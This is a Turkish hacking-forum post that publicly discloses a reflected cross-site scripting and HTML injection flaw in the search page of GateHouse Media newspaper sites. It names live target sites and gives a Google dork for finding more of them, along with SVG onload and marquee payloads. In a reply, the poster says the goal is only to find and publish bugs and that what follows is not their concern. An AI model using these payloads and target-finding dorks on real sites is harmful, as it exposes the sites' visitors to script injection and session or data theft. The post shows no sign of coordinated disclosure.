GateHouse Media LLC - XSS / Bug Researchers Kulüp

Pentester

Özel Üye
8 Eyl 2016
1,646
996
Bug bana aittir, ayrıntılar aşağıda..

Kod:
<------------------ header data start ------------------- >
#############################################################
# Application Name : GateHouse Media, LLC - XSS
# Vulnerable Type : Cross Site Scripting & HTML İnjection
# Author: Turkhackteam | Pentester | Bug Researchers 
# Date: 13.12.2016
# Tested on: Windows 8.1 / Google Chrome / Mozilla Firefox
# Google Dork: intext:"Copyright 2006-2016 GateHouse Media, LLC. Some rights reserved" inurl:search?q=
# Vulnerable Parameter: GET /search?q=
# XSS: Http://localhost/search?q=<svg/onload=alert(’XSS’)>
# Tested On Demo Sites:
http://www.theledger.com/search?q=
http://www.theledger.com/search?q=
http://www.mailtribune.com/search?q=
< ------------------- header data end of ------------------- >

< -- bug code start -- >

<svg/onload=alert(’XSS’)>
<marquee>Bug Researchers</marquee>
<marquee onmouseout="this.start();" onmouseover="this.stop();"> Bug Researchers </marquee>

< -- / bug code end of -- >
 

Pentester

Özel Üye
8 Eyl 2016
1,646
996
Adre, amacımız zaten hazır bir scriptte bug keşfetmek ve yayınlamak :) gerisi bizi bağlamaz :D
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.